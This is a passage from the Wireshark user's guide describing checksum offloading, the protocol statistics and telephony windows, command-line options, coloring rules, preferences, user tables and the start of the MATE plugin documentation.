switched off for various protocols in the Wireshark protocol preferences, e.g. to (very slightly) increase performance. If the checksum validation is enabled and it detected an invalid checksum, features like packet reassembly won’t even see the packet, as the Ethernet hardware internally throws away the packet. Higher level checksums are “traditionally” calculated by the protocol implementation and the completed packet is then handed over to the hardware. Recent network hardware can perform advanced features such as IP checksum calculation, also known as checksum offloading. The network driver won’t calculate the checksum itself but will simply hand over an empty (zero or garbage filled) checksum field to the hardware. Checksum offloading can be confusing and having a lot of [invalid] messages on the screen can be quite annoying. As mentioned above, invalid checksums may lead to unreassembled packets, making the analysis of the packet data much harder. You can do two things to avoid this checksum offloading problem: Table. General information about the current capture file. This dialog shows the following information: Notable information about the capture file. The Resolved Addresses window shows the list of resolved addresses and their host names. Users can choose the Hosts field to display IPv4 and IPv6 addresses only. In this case, the dialog displays host names for each IP address in a capture file with a known host. This host is typically taken from DNS answers in a capture file. In case of an unknown host name, users can populate it based on a reverse DNS lookup. To do so, follow these steps: Resolve Network Addressesin the → menu as this option is disabled by default. Use an external network name resolverin the → menu. This option is enabled by default. The Ports tab shows the list of service names, ports and types. Wireshark reads the entries for port mappings from the hosts service configuration files. See Section B.3, “Configuration Files” section for more information. The. This can be caused by continuation frames, TCP protocol overhead, and other undissected data. A single packet can contain the same protocol more than once. In this case, the protocol is counted more than once. For example ICMP replies and many tunneling protocols will carry more than one IP header. A A Shows the distribution of packet lengths and related information. Information is broken down by packet length ranges as shown above. The range of packet lengths. Ranges can be configured in the “Statistics → Stats Tree” section of the Preferences Dialog. Packet bursts are detected by counting the number of packets in a given time interval and comparing that count to the intervals across a window of time. Statistics for the interval with the maximum number of packets are shown. By default, bursts are detected across 5 millisecond intervals and intervals are compared across 100 millisecond windows. These calculations can be adjusted in the “Statistics” section of the Preferences Dialog. You can show statistics for a portion of the capture by entering a display filter into the Display filter entry and pressing . copies the statistics to the clipboard. lets you save the data as text, CSV, YAML, or XML.copies the statistics to the clipboard. lets you save the data as text, CSV, YAML, or XML. Lets. The. The Dynamic Host Configuration Protocol (DHCP) is an option of the Bootstrap Protocol (BOOTP). It dynamically assigns IP addresses and other parameters to a DHCP client. The DHCP (BOOTP) Statistics window displays a table over the number of occurrences of a DHCP message type. The user can filter, copy or save the data into a file. Open Network Computing (ONC) Remote Procedure Call (RPC) uses TCP or UDP protocols to map a program number to a specific port on a remote machine and call a required service at that port. The ONC-RPC Programs window shows the description for captured program calls, such as program name, its number, version, and other data. The 29West technology now refers to Ultra-Low Latency Messaging (ULLM) technology. It allows sending and receiving a high number of messages per second with microsecond delivery times for zero-latency data delivery. The→ shows: The Access Node Control Protocol (ANCP) is an TCP based protocol, which operates between an Access Node and Network Access Server. The Wireshark ANCP dissector supports the listed below messages: The ANCP window shows the related statistical data. The user can filter, copy or save the data into a file. Building Automation and Control Networks (BACnet) is a communication protocol which provides control for various building automated facilities, such as light control, fire alarm control, and others. Wireshark provides the BACnet statistics which is a packet counter. You can sort packets by instance ID, IP address, object type or service. Collectd is a system statistics collection daemon. It collects various statistics from your system and converts it for the network use. The Collectd statistics window shows counts for values, which split into type, plugin, and host as well as total packets counter. You can filter, copy or save the data to a file. The Domain Name System (DNS) associates different information, such as IP addresses, with domain names. DNS returns different codes, request-response and counters for various aggregations. The DNS statistics window enlists a total count of DNS messages, which are divided into groups by request types (opcodes), response code (rcode), query type, and others. You might find these statistics useful for quickly examining the health of a DNS service or other investigations. See the few possible scenarios below: You can filter, copy or save the data into a file. The Flow Graph window shows connections between hosts. It displays the packet time, direction, ports and comments for each captured connection. You can filter all connections by ICMP Flows, ICMPv6 Flows, UIM Flows and TCP Flows. Flow Graph window is used for showing multiple different topics. Based on it, it offers different controls. Each vertical line represents the specific host, which you can see in the top of the window. The numbers in each row at the very left of the window represent the time packet. You can change the time format in the→ . If you change the time format, you must relaunch the Flow Graph window to observe the time in a new format. The numbers at the both ends of each arrow between hosts represent the port numbers. Left-click a row to select a corresponding packet in the packet list. Right-click on the graph for additional options, such as selecting the previous, current, or next packet in the packet list. This menu also contains shortcuts for moving the diagram. Available controls: Additional shortcuts available for VoIP calls: On selected RTP stream Additional controls available for VoIP calls: Highway Addressable Remote Transducer over IP (HART-IP) is an application layer protocol. It sends and receives digital information between smart devices and control or monitoring systems. The HART-IP statistics window shows the counter for response, request, publish and error packets. You can filter, copy or save the data to a file. Hpfeeds protocol provides a lightweight authenticated publishing and subscription. It supports arbitrary binary payloads which can be separated into different channels. HPFEEDS statistics window shows a counter for payload size per channel and opcodes. You can filter, copy or save the data to a file. HTTP request and response statistics based on the server address and host. Hypertext Transfer Protocol version 2 (HTTP/2) allows multiplexing various HTTP requests and responses over a single connection. It uses a binary encoding which is consisting of frames. The HTTP/2 statistics window shows the total number of HTTP/2 frames and also provides a breakdown per frame types, such as HEADERS, DATA, and others. As HTTP/2 traffic is typically encrypted with TLS, you must configure decryption to observe HTTP/2 traffic. For more details, see the TLS wiki page. Sametime is a protocol for the IBM Sametime software. The Sametime statistics window shows the counter for message type, send type, and user status. Show different visual representations of the TCP streams in a capture. The UDP Multicast Streams window shows statistics for all UDP multicast streams. It includes source addresses and ports, destination addresses and ports, packets counter and other data. You can specify the burst interval, the alarm limits and output speeds. To apply new settings, press. With this statistics you can: The Reliable Server Pooling (RSerPool) windows show statistics for the different protocols of Reliable Server Pooling (RSerPool): With these statistics you can: See Thomas Dreibholz’s Reliable Server Pooling (RSerPool) Page and Chapter 3 of Reliable Server Pooling – Evaluation, Optimization and Extension of a Novel IETF Architecture for more details about RSerPool and its protocols. In F5 Networks, TMM stands for Traffic Management Microkernel. It processes all load-balanced traffic on the BIG-IP system. The F5 statistics menu shows packet and byte counts for both Virtual Server Distribution and tmm Distribution submenus. Each Virtual Server Distribution window contains the statistics for the following data: Each tmm Distribution window contains the statistics for the following data: A line for each tmm, which contains: A line for each ingress and egress (should add to tmm total), which contains: Internet Protocol version 4 (IPv4) is a core protocol for the internet layer. It uses 32-bit addresses and allows packets routing from one source host to the next one. The→ menu provides the packet counter by submenus: All Addresses. Divides data by IP address. Destination and Ports. Divides data by IP address, and further by IP protocol type, such as TCP, UDP, and others. It also shows port number. IP Protocol Types. Divides data by IP protocol type. Source and Destination addresses. Divides data by source and destination IP address. You can see similar statistics in the→ and → menus. Internet Protocol version 6 (IPv6) is a core protocol for the internet layer. It uses 128-bit addresses and routes internet traffic. Similar to Section 8.27, “IPv4 Statistics”, the → menu shows the packet counter in each submenu. Table of Contents Wireshark provides a wide range of telephony related network statistics which can be accessed via themenu. These statistics range from specific signaling protocols, to analysis of signaling and media flows. If encoded in a compatible encoding the media flow can even be played. The protocol specific statistics windows display detailed information of specific protocols and might be described in a later version of this document. Some of these statistics are described at the pages. The tool for playing VoIP calls is called RTP Player. It shows RTP streams and its waveforms, allows play stream and export it as audio or payload to file. Its capabilities depends on supported codecs. RTP Player is able to play any codec supported by an installed plugins. The codecs supported by RTP Player depend on the version of Wireshark you’re using. The official builds contain all of the plugins maintained by the Wireshark developers, but custom/distribution builds might not include some of those codecs. To check your Wireshark follow this procedure: Wireshark can be used for RTP stream analysis. User can select one or more streams which can be played later. RTP Player window maintains playlist (list of RTP streams) for this purpose. Playlist is created empty when RTP Player window is opened and destroyed when window is closed. RTP Player window can be opened on background when not needed and put to front later. During its live, playlist is maintained. When RTP Player window is opened, playlist can be modified from other tools (Wireshark windows) in three ways: When playlist is empty, there is no difference betweenand . When RTP Player window is not opened, all three actions above open it. is useful e. g. in case user selected all RTP streams and wants to remove RTP streams from specific calls found with .is useful e. g. in case user selected all RTP streams and wants to remove RTP streams from specific calls found with . Tools below can be used to maintain content of playlist, they containbutton. You can use one of procedures (Note: action is demonstrated): Select any RTP packet in packet list, open→ → window. It will show analysis of selected forward stream and its reverse stream (if is pressed during window opening). Then press . Forward and reverse stream is added to playlist. RTP is carried usually in UDP packets, on random source and destination port. Therefore without "help" Wireshark can’t recognize it and shows just UDP packets. Wireshark recognizes RTP streams based on VoIP signaling, e. g. based on SDP message in SIP signaling. When signaling is not captured, Wireshark shows just UDP packets. There are multiple settings which helps Wireshark to recognize RTP even there is no related signaling. You can use Decode As… function from → menu or in mouse context menu. Here you can set that traffic on specific source or destination should be decoded as RTP. You can save settings for later use. Use ofmenu works fine, but for many streams it is arduous. You can enable heuristic dissector Section 11.4, “Control Protocol dissection” for details. Once is enabled, Wireshark tries every UDP packet to decode as RTP. If decoding is possible, packet (and entire UDP stream) is decoded as RTP.in → . See When RTP stream uses well know port, heuristic dissector ignores it. So you might miss some RTP streams. You can enable setting for udp protocol Section 11.5, “Preferences”. In this case heuristics dissector tries to decode UDP packet even it uses well known.→ → → , see Processing of RTP and decoding RTP voice takes resources. There are raw estimates you can use as guidelines… RTP Streams window can show as many streams as found in the capture. Its performance is limited just by memory and CPU. RTP Player can handle 1000+ streams, but take into account that waveforms are very small in this case. RTP Player creates temporary file for decoding of each stream. If your OS or user has OS enforced limit for count of opened files (most of Unix/Linux systems), you can see less streams that was added to playlist. Warnings are printed on console in this case and you will see less streams in the playlist than you send to it from other tools. RTP Player plays audio by OS sound system and OS is responsible for mixing audio when multiple streams are played. In many cases OS sound system has limited count of mixed streams it can play/mix. RTP Player tries to handle playback failures and show warning. If it happens, just mute some streams and start playback again. RTP Analysis window can handle 1000+ streams, but it is difficult to use it with so many streams - it is difficult to navigate between them. It is expected that RTP Analysis window will be used for analysis of lower tens of streams. The VoIP Calls window shows a list of all detected VoIP calls in the captured traffic. It finds calls by their signaling and shows related RTP streams. The current VoIP supported protocols are: See VOIPProtocolFamily for an overview of the used VoIP protocols. VoIP Calls window can be opened as window showing all protocol types (→ window) or limited to SIP messages only ( → window). User can use shortcuts: Selection On selected call/calls Available controls are: This menu shows groups of statistic data for mobile communication protocols according to ETSI GSM standards. The A-Interface Base Station Management Application Part (BSMAP) Statistics window shows the messages list and the number of the captured messages. There is a possibility to filter the messages, copy or save the date into a file. The Global System for Mobile Communications (GSM) is a standard for mobile networks. This menu shows a group of statistic data for mobile communication protocols according to ETSI GSM standard. The “IAX2 Stream Analysis” window shows statistics for the forward and reverse streams of a selected IAX2 call along with a graph. Integrated Service User Part (ISUP) protocol provides voice and non-voice signaling for telephone communications. ISUP Messages menu opens the window which shows the related statistics. The user can filter, copy or save the data into a file. Statistics of the captured LTE MAC traffic. This window will summarize the LTE MAC traffic found in the capture. The top pane shows statistics for common channels. Each row in the middle pane shows statistical highlights for exactly one UE/C-RNTI. In the lower pane, you can see the for the currently selected UE/C-RNTI the traffic broken down by individual channel. The LTE RLC Graph menu launches a graph which shows LTE Radio Link Control protocol sequence numbers changing over time along with acknowledgements which are received in the opposite direction. The image of the RLC Graph is borrowed from Wireshark wiki. Statistics of the captured LTE RLC traffic. This window will summarize the LTE RLC traffic found in the capture. At the top, the check-box allows this window to include RLC PDUs found within MAC PDUs or not. This will affect both the PDUs counted as well as the display filters generated (see below). The upper list shows summaries of each active UE. Each row in the lower list shows statistical highlights for individual channels within the selected UE. The lower part of the windows allows display filters to be generated and set for the selected channel. Note that in the case of Acknowledged Mode channels, if a single direction is chosen, the generated filter will show data in that direction and control PDUs in the opposite direction. The Message Transfer Part level 3 (MTP3) protocol is a part of the Signaling System 7 (SS7). The Public Switched Telephone Networks use it for reliable, unduplicated and in-sequence transport of SS7 messaging between communication partners. This menu shows MTP3 Statistics and MTP3 Summary windows. OSmux is a multiplex protocol which benefits satellite based GSM back-haul systems by reducing the bandwidth consumption of the voice proxying (RTP-AMR) and signaling traffic. The OSmux menu opens the packet counter window with the related statistic data. The user can filter, copy or save the data into a file. The RTP streams window shows all RTP streams in capture file. Streams can be selected there and on selected streams other tools can be initiated. User can use shortcuts: Selection Find Reverse Available controls are: Find Reverse The RTP analysis function takes the selected RTP streams and generates a list of statistics on it including graph. Menu→ → is enabled only when selected packed is RTP packet. When window is opened, selected RTP stream is added to analysis. If is pressed during menu opening, reverse RTP stream (if exists) is added to the window too. Every stream is shown on own tab. Tabs are numbered as streams are added and its tooltip shows identification of the stream. When tab is closed, number is not reused. Color of tab matches color of graphs on graph tab. Per packet statistic shows: Side panel left to packet list shows stream statistics: Available shortcuts are: Available controls are: Prepare Filter Graph view shows graph of: for every stream. Checkboxes below graph are enabling or disabling showing of a graph for every stream.checkbox enables or disables all graphs for the stream. The RTP Player function is tool for playing VoIP calls. It shows RTP streams and its waveforms, allows play stream and export it as audio or payload to file. See related concepts in Section 9.2, “Playing VoIP Calls”. Menu→ → is enabled only when selected packed is RTP packet. When window is opened, selected RTP stream is added to playlist. If is pressed during menu opening, reverse RTP stream (if exists) is added to the playlist too. RTP Player Window consists of three parts: Waveform view shows visual presentation of RTP stream. Color of waveform and playlist row are matching. Height of wave shows volume. Waveform shows error marks for Out of Sequence, Jitter Drops, Wrong Timestamps and Inserted Silence marks if it happens in a stream. Playlist shows information about every stream: Setup Frame Controls allow a user to: Inaudible streams Waveform view and playlist shows state of a RTP stream: User can control to where audio of a stream is routed to: Audio routing can be changed by double clicking on first column of a row, by shortcut or by menu. User can use shortcuts: Selection Go to packet Audio routing Inaudible steams Export options available: for one or more selected non-muted streams for just one selected stream Audio is exported as multi-channel file - one channel per RTP stream. One or two channels are equal to mono or stereo, but Wireshark can export e g. 100 channels. For later playing a tool with multi-channel support must be used (e.g.). Export of payload function is useful for codecs not supported by Wireshark. In the Real Time Streaming Protocol (RTSP) menu the user can check the Packet Counter window. It shows Total RTCP Packets and divided into RTSP Response Packets, RTSP Request Packets and Other RTSP packets. The user can filter, copy or save the data into a file. Stream Control Transmission Protocol (SCTP) is a computer network protocol which provides a message transfer in telecommunication in the transport layer. It overcomes some lacks of User Datagram Protocol (UDP) and Transmission Control Protocol (TCP). The SCTP packets consist of the common header and the data chunks. The SCTP Analyze Association window shows the statistics of the captured packets between two Endpoints. You can check the different chunk types by pressing Statistics tab. In the Endpoint tabs you can see various statistics, such as IP addresses, ports and others. Also you can check different graphs here. The SCTP Associations window shows the table with the data for captured packets, such as port and counter. You can also call for the SCTP Analyze Association window by pressing thebutton. Short Message Peer-to-Peer (SMPP) protocol uses TCP protocol as its transfer for exchanging Short Message Service (SMS) Messages, mainly between Short Message Service Centers (SMSC). The dissector determines whether the captured packet is SMPP or not by using the heuristics in the fixed header. The SMPP Operations window displays the related statistical data. The user can filter, copy or save the data into a file. The Universal Computer Protocol (UCP) plays role in transferring Short Messages between a Short Message Service Centre (SMSC) and an application, which is using transport protocol, such as TCP or X.25. The UCP Messages window displays the related statistical data. The user can filter, copy or save the data into a file. H.225 telecommunication protocol which is responsible for messages in call signaling and media stream packetization for packet-based multimedia communication systems. The H.225 window shows the counted messages by types and reasons. The user can filter, copy or save the data into a file. Session Initiation Protocol (SIP) Flows window shows the list of all captured SIP transactions, such as client registrations, messages, calls and so on. This window will list both complete and in-progress SIP transactions. Window has same features as VoIP Calls window. SIP Statistics window shows captured SIP transactions. It is divided into SIP Responses and SIP Requests. In this window the user can filter, copy or save the statistics into a file. Table of Contents Bluetooth ATT Server Attributes window displays a list of captured Attribute Protocol (ATT) packets. The user can filter the list by the interfaces or devices, and also exclude repetitions by checking the Remove duplicates check box. Handle is a unique attribute which is specific to the device. UUID is a value which defines a type of an attribute. UUID Name is a specified name for the captured packet. The Bluetooth Devices window displays the list of the captured information about devices, such as MAC address, Organizationally Unique Identifier (OUI), Name and other. Users can filter it by interface. The Bluetooth HCI Summary window displays the summary for the captured Host Controller Interface (HCI) layer packets. This window allows users to apply filters and choose to display information about specific interfaces or devices. Statistics about captured WLAN traffic. This can be found under themenu and summarizes the wireless network traffic found in the capture. Probe requests will be merged into an existing network if the SSID matches. the list. Thebutton will copy the list values to the clipboard in CSV (Comma Separated Values) format. Table of Contents Wireshark’s default behaviour will usually suit your needs pretty well. However, as you become more familiar with Wireshark, it can be customized in various ways to suit your needs even better. In this chapter we explore: You can start Wireshark from the command line, but it can also be started from most Window managers as well.. Wireshark 3.5.0 (v3.5.0rc0-21-gce47866a4337) Interactively dump and analyze network traffic. See for more information. Usage: wireshark [options] ... [ <infile> ] -k start capturing immediately (def: do nothing) -S update packet display when new packets are captured -l turn on automatic scrolling while -S is in use (no pipes or stdin!) Processing: -R <read filter>, --read-filter <read filter> packet --enable-protocol <proto_name> enable dissection of proto_name --disable-protocol <proto_name> disable dissection of proto_name --enable-heuristic <short_name> enable dissection of heuristic protocol --disable-heuristic <short_name> disable dissection of heuristic protocol User interface: -C <config profile> start with specified configuration profile -H hide the capture info dialog during packet capture -Y <display filter>, --display-filter <display filter> start with the given display filter -g <packet number> go to specified packet number after "-r" -J <jump filter> jump to the first packet matching the (display) filter -j search backwards for a matching packet after "-J" -t a|ad|adoy|d|dd|e|r|u|ud|udoy) --capture-comment <comment> set the capture file comment, if supported Miscellaneous: -h, --help display this help and exit -v, --version display version info and exit -P <key>:<path> persconf:path - personal configuration files persdata:path - personal data files -o <name>:<value> ... override preference or recent setting -K <keytab> keytab file to use for kerberos decryption --display <X display> X display to use --fullscreen start Wireshark in full screen We will examine each of the command line options in turn. The first thing to notice is that issuing the command wireshark by itself will bring up Wireshark. However, you can include as many of the command line parameters as you like. Their meanings are as follows ( in alphabetical order ): Specify a criterion that specifies when Wireshark is to stop writing to a capture file. The criterion is of the form test:value, where test is one of: If a maximum capture file size was specified, this option causes Wireshark to run in “ring buffer” mode, with the specified number of files. In “ring buffer” mode, Wireshark will write to several capture files. Their name is based on the number of the file and on the creation date and time. When the first capture file fills up Wireshark will switch to writing to the next file, and so on. With the files option it’s also possible to form a “ring buffer.” This will fill up new files until the number of files specified, at which point the data in the first file will be discarded so a new file can be written. If the optional duration is specified, Wireshark will also switch to the next file when the specified number of seconds has elapsed even if the current file is not completely filled up. -koption. Print a list of the interfaces on which Wireshark can capture, then exit. especially useful on Windows, where the interface name is a GUID. Note that “can capture” means that Wireshark was able to open that device to do a live capture. If, on your system, a program doing a network capture must be run from an account with special privileges, then, if Wireshark is run with the -D flag and is not run from such an account, it will not list any interfaces. Set the name of the network interface or pipe to use for live packet capture. Network interface names should match one of the names listed in wireshark -D (described above). A number, as reported by wireshark -D, can also be used. If you’re using UNIX, netstat -i, ifconfig -a or ip link, Wireshark reports an error and doesn’t start the capture. Pipe names should be either the name of a FIFO (named pipe) or “-” to read data from the standard input. Data read from pipes must be in standard libpcap format. -rflag, jump to the first packet which matches the filter expression. The filter expression is in display filter format. If an exact match cannot be found the first packet afterwards is selected. -Joption to search backwards for a first packet to go to. -koption specifies that Wireshark should start capturing packets immediately. This option requires the use of the -iparameter to specify the interface that packet capture will occur from. -Sflag). Turns on name resolving for particular types of addresses and port numbers. The argument is a string that may contain the following letters: Sets a preference or recent value, overriding the default value and any value read from a preference or recent file. The argument to the flag is a string of the form prefname:value, where prefname is the name of the preference (which is the same name that would appear in the preferences or recent file), and value is the value to which it should be set. Multiple instances of `-o <preference settings> ` can be given on a single command line. An example of setting a single preference would be: wireshark -o mgcp.display_dissect_tree:TRUE An example of setting multiple preferences would be: wireshark -o mgcp.display_dissect_tree:TRUE -o mgcp.udp.callagent_port:2627 You can get a list of all available preference strings from the preferences file. See Appendix B, Files and Folders for details. User access tables can be overridden using “uat,” followed by the UAT file name and a valid record for the file: wireshark -o "uat:user_dlts:\"User 0 (DLT=147)\",\"http\",\"0\",\"\",\"0\",\"\"" The example above would dissect packets with a libpcap data link type 147 as HTTP, just as if you had configured it in the DLT_USER protocol preferences. -pcannot be used to ensure that the only traffic that is captured is traffic sent to or from the machine on which Wireshark is running, broadcast traffic, and multicast traffic to addresses received by that machine. Special path settings usually detected automatically. This is used for special cases, e.g. starting Wireshark from a known location on an USB stick. The criterion is of the form key:path, where key is one of: This option sets the format of packet timestamps that are displayed in the packet list window. The format can be one of: dd: Delta, which specifies that timestamps are relative to the previous displayed packet. -k, set the data link type to use while capturing packets. The values reported by -Lare the values that can be used. -k, set the time stamp type to use while capturing packets. The values reported by --list-time-stamp-typesare the values that can be used. Specify an option to be passed to a Wireshark/Tshark module. The eXtension option is in the form extension_key:value, where extension_key can be: -X lua_script:my.lua, then -X lua_script1:foowill pass the string foo to the my.lua script. If two scripts were loaded, such as -X lua_script:my.lua -X lua_script:other.luain that order, then a -X lua_script2:barwould pass the string bar to the second lua script, ie., other.lua. A very useful mechanism available in Wireshark is packet colorization. You can set up Wireshark so that it will colorize packets according to a display filter. This allows you to emphasize the packets you might be interested in. You can find a lot of coloring rule examples at the Wireshark Wiki Coloring Rules page Figure 11.1, “The “Coloring Rules” dialog box”.→ . Wireshark will display the “Coloring Rules” dialog box as shown in If this is the first time using the Coloring Rules dialog and you’re using the default configuration profile you should see the default rules, shown above. You can create a new rule by clicking on thebutton. You can delete one or more rules by clicking the button. The “copy” button will duplicate a rule. You can edit a rule by double-clicking on its name or filter. In Figure 11.1, “The “Coloring Rules” dialog box” the name of the rule “Checksum Errors” is being edited. Clicking on the and buttons will open a color chooser (Figure 11.2, “A color chooser”) for the foreground (text) and background colors respectively. The color chooser appearance depends on your operating system. The macOS color picker is shown. Select the color you desire for the selected packets and click. Figure 11.3, “Using color filters with Wireshark” shows an example of several color filters being used in Wireshark. Note that the frame detail shows that the “Bad TCP” rule was applied, along with the matching filter. The user can control how protocols are dissected. Each protocol has its own dissector, so dissecting a complete packet will typically involve several dissectors. As Wireshark tries to find the right dissector for each packet (using static “routes” and heuristics “guessing”), it might choose the wrong dissector in your specific case. For example, Wireshark won’t know if you use a common protocol on an uncommon TCP port, e.g. using HTTP on TCP port 800 instead of the standard port 80. There are two ways to control the relations between protocol dissectors: disable a protocol dissector completely or temporarily divert the way Wireshark calls the dissectors. The Enabled Protocols dialog box lets you enable or disable specific protocols. Most protocols are enabled by default. When a protocol is disabled, Wireshark stops processing a packet whenever that protocol is encountered. To enable or disable protocols select Figure 11.4, “The “Enabled Protocols” dialog box”.→ . Wireshark will pop up the “Enabled Protocols” dialog box as shown in To disable or enable a protocol, simply click the checkbox using the mouse. Note that typing a few letters of the protocol name in the search box will limit the list to those protocols that contain these letters. You can choose from the following actions: The “Decode As” functionality lets you temporarily divert specific protocol dissections. This might be useful for example, if you do some uncommon experiments on your network. Decode As is accessed by selecting the Figure 11.5, “The “Decode As” dialog box”.→ . Wireshark will pop up the “Decode As” dialog box as shown in In this dialog you are able to edit entries by means of the edit buttons on the left. You can also pop up this dialog box from the context menu in the packet list or packet details. It will then contain a new line based on the currently selected packet. These settings will be lost if you quit Wireshark or change profile unless you save the entries. There are a number of preferences you can set. Simply select the Figure 11.6, “The preferences dialog box”, with the “User Interface” page as default. On the left side is a tree where you can select the page to be shown.→ ( → on macOS) and Wireshark will pop up the Preferences dialog box as shown in Wireshark supports quite a few protocols, which is reflected in the long list of entries in the “Protocols” pane. You can jump to the preferences for a specific protocol by expanding “Protocols” and quickly typing the first few letters of the protocol name. The “Advanced” pane will let you view and edit all of Wireshark’s preferences, similar to about:config and chrome:flags in the Firefox and Chrome web browsers. You can search for a preference by typing text into the “Search” entry. You can also pass preference names to Wireshark and TShark on the command line. For example, the gui.prepend_window_title can be used to differentiate between different instances of Wireshark: $ wireshark -o "gui.prepend_window_title:Internal Network" & $ wireshark -o "gui.prepend_window_title:External Network" & Configuration Profiles can be used to configure and use more than one set of preferences and configurations. Select the Shift+Ctrl+A or Shift+⌘+A (macOS) and Wireshark will pop up the Configuration Profiles dialog box as shown in Figure 11.8, “The configuration profiles dialog box”. It is also possible to click in the “Profile” part of the statusbar to popup a menu with available Configuration Profiles (Figure 3.22, “The Statusbar with a configuration profile menu”).→ menu item or press Configuration files stored in each profile include: User Accessible Tables: All other configurations are stored in the personal configuration folder and are common to all profiles. Profiles can be filtered between displaying "All profiles", "Personal profiles" and "Global profiles" The User Table editor is used for managing various tables in Wireshark. Its main dialog works very similarly to that of Section 11.3, “Packet colorization”. Display user table, as described in Section 11.7, “User Table”, by selecting → from the menu. The User Table has the following fields: Wireshark uses this table to map ESS Security Category attributes to textual representations. The values to put in this table are usually found in a XML SPIF, which is used for defining security labels. This table is a user table, as described in Section 11.7, “User Table”, with the following fields: If your copy of Wireshark supports MaxMind’s MaxMindDB library, you can use their databases to match IP addresses to countries, cites, autonomous system numbers, and other bits of information. Some databases are available at no cost for registered users, while others require a licensing fee. See the MaxMind web site for more information. The configuration for the MaxMind database is a user table, as described in Section 11.7, “User Table”, with the following fields: The locations for your data files are up to you, but /usr/share/GeoIP and /var/lib/GeoIP are common on Linux and C:\ProgramData\GeoIP, C:\Program Files\Wireshark\GeoIP might be good choices on Windows. Previous versions of Wireshark supported MaxMind’s original GeoIP Legacy database format. They were configured similar to MaxMindDB files above, except GeoIP files must begin with Geo and end with .dat. They are no longer supported and MaxMind stopped distributing GeoLite Legacy databases in April 2018. Wireshark can decrypt Encrypted Payloads of IKEv2 (Internet Key Exchange version 2) packets if necessary information is provided. Note that you can decrypt only IKEv2 packets with this feature. If you want to decrypt IKEv1 packets or ESP packets, use Log Filename setting under ISAKMP protocol preference or settings under ESP protocol preference respectively. This is handled by a user table, as described in Section 11.7, “User Table”, with the following fields: Many protocols that use ASN.1 use Object Identifiers (OIDs) to uniquely identify certain pieces of information. In many cases, they are used in an extension mechanism so that new object identifiers (and associated values) may be defined without needing to change the base standard. While Wireshark has knowledge about many of the OIDs and the syntax of their associated values, the extensibility means that other values may be encountered. Wireshark uses this table to allow the user to define the name and syntax of Object Identifiers that Wireshark does not know about (for example, a privately defined X.400 extension). It also allows the user to override the name and syntax of Object Identifiers that Wireshark does know about (e.g. changing the name “id-at-countryName” to just “c”). This table is a user table, as described in Section 11.7, “User Table”, with the following fields: Wireshark uses this table to map a presentation context identifier to a given object identifier when the capture does not contain a PRES package with a presentation context definition list for the conversation. This table is a user table, as described in Section 11.7, “User Table”, with the following fields: Wireshark uses this table to map specific protocols to a certain DPC/SSN combination for SCCP. This table is a user table, as described in Section 11.7, “User Table”, with the following fields: If your copy of Wireshark supports libSMI, you can specify a list of MIB and PIB modules here. The COPS and SNMP dissectors can use them to resolve OIDs. If your copy of Wireshark supports libSMI, you can specify one or more paths to MIB and PIB modules here. /usr/local/snmp/mibs. Wireshark automatically uses the standard SMI path for your system, so you usually don’t have to add anything here. Wireshark uses this table to map specific-trap values to user defined descriptions in a Trap PDU. The description is shown in the packet details specific-trap element. This table is a user table, as described in Section 11.7, “User Table”, with the following fields: Wireshark uses this table to verify authentication and to decrypt encrypted SNMPv3 packets. This table is a user table, as described in Section 11.7, “User Table”, with the following fields: The Tektronix K12xx/15 rf5 file format uses helper files (*.stk) to identify the various protocols that are used by a certain interface. Wireshark doesn’t read these stk files, it uses a table that helps it identify which lowest layer protocol to use. Stk file to protocol matching is handled by a user table, as described in Section 11.7, “User Table”, with the following fields: When a pcap file uses one of the user DLTs (147 to 162) Wireshark uses this table to know which protocol(s) to use for each user DLT. This table is a user table, as described in Section 11.7, “User Table”, with the following fields: The binary wire format of Protocol Buffers (Protobuf) messages are not self-described protocol. For example, the varint wire type in protobuf packet may be converted to int32, int64, uint32, uint64, sint32, sint64, bool or enum field types of protocol buffers language. Wireshark should be configured with Protocol Buffers language files (*.proto) to enable proper dissection of protobuf data (which may be payload of gRPC) based on the message, enum and field definitions. You can specify protobuf search paths at the Protobuf protocol preferences. For example, if you defined a proto file with path d:/my_proto_files/helloworld.proto and the helloworld.proto contains a line of import "google/protobuf/any.proto"; because the any type of official protobuf library is used. And the real path of any.proto is d:/protobuf-3.4.1/include/google/protobuf/any.proto. You should add the d:/protobuf-3.4.1/include/ and d:/my_proto_files paths into protobuf search paths. The configuration for the protobuf search paths is a user table, as described in Section 11.7, “User Table”, with the following fields: d:/protobuf-3.4.1/include/and d:/my_proto_filesin Windows, or /usr/include/and /home/alice/my_proto_filesin Linux/UNIX. d:/protobuf-3.4.1/include/) should not be set to load all files, that may cause unnecessary memory use. If the payload of UDP on certain ports is Protobuf encoding, Wireshark use this table to know which Protobuf message type should be used to parsing the data on the specified UDP port(s). The configuration for UDP Port(s) to Protobuf message type maps is a user table, as described in Section 11.7, “User Table”, with the following fields: Tips: You can create your own dissector to call Protobuf dissector. If your dissector is written in C language, you can pass the message type to Protobuf dissector by data parameter of call_dissector_with_data() function. If your dissector is written in Lua, you can pass the message type to Protobuf dissector by pinfo.private["pb_msg_type"]. The format of data and pinfo.private["pb_msg_type"] is "message," message_type_name For example: message,helloworld.HelloRequest the helloworld is package name, HelloRequest is message type. Table of Contents MATE: a Wireshark plugin that allows the user to specify how different frames are related to each other. To do so, MATE extracts data from the frames': These are the steps to try out MATE: mate tcp_pdu:1→tcp_ses:1or, at prompt: path_to/wireshark -o "mate.config: tcp.mate" -r http.cap. If anything went well, your packet details might look something like this: MATE creates a filterable tree based on information contained in frames that share some relationship with information obtained from other frames. The way this relationships are made is described in a configuration file. The configuration file tells MATE what makes a PDU and how to relate it to other PDUs. MATE analyzes each frame to extract relevant information from the "protocol" tree of that frame. The extracted information is contained in MATE PDUs; these contain a list of relevant attributes taken from the tree. From now on, I will use the term "PDU" to refer to the objects created by MATE containing the relevant information extracted from the frame; I’ll use "frame" to refer to the "raw" information extracted by the various dissectors that pre-analyzed the frame. For every PDU, MATE checks if it belongs to an existing "Group of PDUs" (Gop). If it does, it assigns the PDU to that Gop and moves any new relevant attributes to the Gop’s attribute list. How and when do PDUs belong to Gops is described in the configuration file as well. Every time a Gop is assigned a new PDU, MATE will check if it matches the conditions to make it belong to a "Group of Groups" (Gog). Naturally the conditions that make a Gop belong to a Gog are taken from the configuration file as well. Once MATE is done analyzing the frame it will be able to create a "protocol" tree for each frame based on the PDUs, the Gops they belong to and naturally any Gogs the former belongs to. How to tell MATE what to extract, how to group it and then how to relate those groups is made using AVPs and AVPLs. Information in MATE is contained in Attribute/Value Pairs (AVPs). AVPs are made of two strings: the name and the value. AVPs are used in the configuration and there they have an operator as 